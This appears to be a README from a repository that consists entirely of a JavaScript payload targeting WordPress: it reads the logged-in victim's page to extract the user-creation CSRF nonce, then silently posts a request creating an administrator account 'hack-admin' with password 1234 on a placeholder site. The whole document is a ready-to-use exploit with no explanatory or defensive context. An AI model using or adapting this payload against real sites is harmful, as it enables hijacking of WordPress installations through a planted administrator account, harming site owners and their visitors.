README.md
Rendering markdown...
function getCSRFToken(url, csrf_token_id, func){
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
var parser = new DOMParser();
var htmlDocument = parser.parseFromString(this.responseText, "text/html");
var token = htmlDocument.getElementById(csrf_token_id).value;
func(token);
}
};
xhr.open("GET", url, true);
xhr.withCredentials = true;
xhr.send();
}
function addAdmin(token){
var xhr = new XMLHttpRequest();
xhr.open("POST","http://vulnerable.site/wp-admin/user-new.php", true);
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("action=createuser&_wpnonce_create-user=" + token + "&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=hack-admin&[email protected]&first_name=&last_name=&url=&pass1=1234&pass2=1234&pw_weak=on&send_user_notification=1&role=administrator&createuser=Add+New+User");
}
getCSRFToken("http://vulnerable.site/wp-admin/user-new.php", "_wpnonce_create-user", addAdmin);